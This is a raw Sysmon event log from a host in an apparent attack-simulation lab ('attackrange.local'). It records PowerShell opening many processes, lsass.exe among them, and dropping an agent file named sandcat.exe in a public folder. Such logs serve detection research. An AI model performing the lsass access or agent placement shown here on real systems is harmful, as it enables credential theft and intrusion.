12:00:51.549{266CAFBE-646E-6064-1B00-00000000AE01}22922908C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{266CAFBE-646C-6064-1700-00000000AE01}1844C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+381f60|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f956f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f94a6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f8620|UNKNOWN(00007FFE11AA3F61) 10341000x80000000000000001530Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:51.549{266CAFBE-646E-6064-1B00-00000000AE01}22922908C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+381f60|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f956f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f94a6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f8620|UNKNOWN(00007FFE11AA3F61) 10341000x80000000000000001529Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:51.549{266CAFBE-646E-6064-1B00-00000000AE01}22922908C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+381f60|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f956f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f94a6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f8620|UNKNOWN(00007FFE11AA3F61) 10341000x80000000000000001528Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:51.549{266CAFBE-646E-6064-1B00-00000000AE01}22922908C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{266CAFBE-646C-6064-1300-00000000AE01}1228C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+381f60|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f956f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f94a6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f8620|UNKNOWN(00007FFE11AA3F61) 10341000x80000000000000001527Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:51.549{266CAFBE-646E-6064-1B00-00000000AE01}22922908C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{266CAFBE-646C-6064-1100-00000000AE01}1200C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+381f60|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f956f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f94a6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f8620|UNKNOWN(00007FFE11AA3F61) 10341000x80000000000000001526Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:51.534{266CAFBE-646E-6064-1B00-00000000AE01}22922908C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{266CAFBE-646C-6064-1200-00000000AE01}1196C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+381f60|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f956f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f94a6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f8620|UNKNOWN(00007FFE11AA3F61) 10341000x80000000000000001525Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:51.534{266CAFBE-646E-6064-1B00-00000000AE01}22922908C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+381f60|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f956f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f94a6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f8620|UNKNOWN(00007FFE11AA3F61) 10341000x80000000000000001524Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:51.534{266CAFBE-646E-6064-1B00-00000000AE01}22922908C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{266CAFBE-646C-6064-0F00-00000000AE01}1116C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+381f60|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f956f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f94a6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f8620|UNKNOWN(00007FFE11AA3F61) 10341000x80000000000000001523Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:51.534{266CAFBE-646E-6064-1B00-00000000AE01}22922908C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{266CAFBE-646C-6064-0D00-00000000AE01}612C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+381f60|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f956f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f94a6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f8620|UNKNOWN(00007FFE11AA3F61) 10341000x80000000000000001522Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:51.534{266CAFBE-646E-6064-1B00-00000000AE01}22922908C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{266CAFBE-646C-6064-0C00-00000000AE01}592C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+381f60|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f956f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f94a6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f8620|UNKNOWN(00007FFE11AA3F61) 10341000x80000000000000001521Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:51.534{266CAFBE-646E-6064-1B00-00000000AE01}22922908C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{266CAFBE-646E-6064-1A00-00000000AE01}2284C:\Windows\System32\RemoteFXvGPUDisablement.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+381f60|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f956f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f94a6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f8620|UNKNOWN(00007FFE11AA3F61) 10341000x80000000000000001520Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:51.534{266CAFBE-646E-6064-1B00-00000000AE01}22922908C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{266CAFBE-646E-6064-1900-00000000AE01}2276C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+381f60|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f956f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f94a6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f8620|UNKNOWN(00007FFE11AA3F61) 10341000x80000000000000001519Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:51.534{266CAFBE-646E-6064-1B00-00000000AE01}22922908C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+381f60|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f956f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f94a6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f8620|UNKNOWN(00007FFE11AA3F61) 10341000x80000000000000001518Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:51.534{266CAFBE-646E-6064-1B00-00000000AE01}22922908C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{266CAFBE-646C-6064-0E00-00000000AE01}1080C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+381f60|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f956f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f94a6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f8620|UNKNOWN(00007FFE11AA3F61) 10341000x80000000000000001517Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:51.534{266CAFBE-646E-6064-1B00-00000000AE01}22922908C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{266CAFBE-646C-6064-1400-00000000AE01}1240C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+381f60|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f956f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f94a6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f8620|UNKNOWN(00007FFE11AA3F61) 10341000x80000000000000001516Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:51.534{266CAFBE-646E-6064-1B00-00000000AE01}22922908C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{266CAFBE-646E-6064-2100-00000000AE01}2468C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+381f60|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f956f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f94a6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f8620|UNKNOWN(00007FFE11AA3F61) 10341000x80000000000000001515Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:51.534{266CAFBE-646E-6064-1B00-00000000AE01}22922908C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{266CAFBE-646E-6064-1E00-00000000AE01}2332C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+381f60|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f956f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f94a6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f8620|UNKNOWN(00007FFE11AA3F61) 10341000x80000000000000001514Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:51.534{266CAFBE-646E-6064-1B00-00000000AE01}22922908C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{266CAFBE-646E-6064-1D00-00000000AE01}2312C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+381f60|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f956f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f94a6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f8620|UNKNOWN(00007FFE11AA3F61) 10341000x80000000000000001513Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:51.534{266CAFBE-646E-6064-1B00-00000000AE01}22922908C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{266CAFBE-646E-6064-1C00-00000000AE01}2304C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+381f60|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f956f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f94a6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f8620|UNKNOWN(00007FFE11AA3F61) 10341000x80000000000000001512Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:51.518{266CAFBE-646E-6064-1B00-00000000AE01}22922908C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{266CAFBE-646E-6064-2000-00000000AE01}2456C:\Windows\system32\compattelrunner.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+381f60|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f956f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f94a6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f8620|UNKNOWN(00007FFE11AA3F61) 11241100x80000000000000001511Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localEXE2021-03-31 12:00:51.268{266CAFBE-646E-6064-1900-00000000AE01}2276C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Public\sandcat.exe2021-03-31 11:59:26.178 10341000x80000000000000001510Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:51.018{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001509Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:51.018{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001508Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:51.018{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001507Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:51.002{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001506Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:51.002{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001505Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:51.002{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 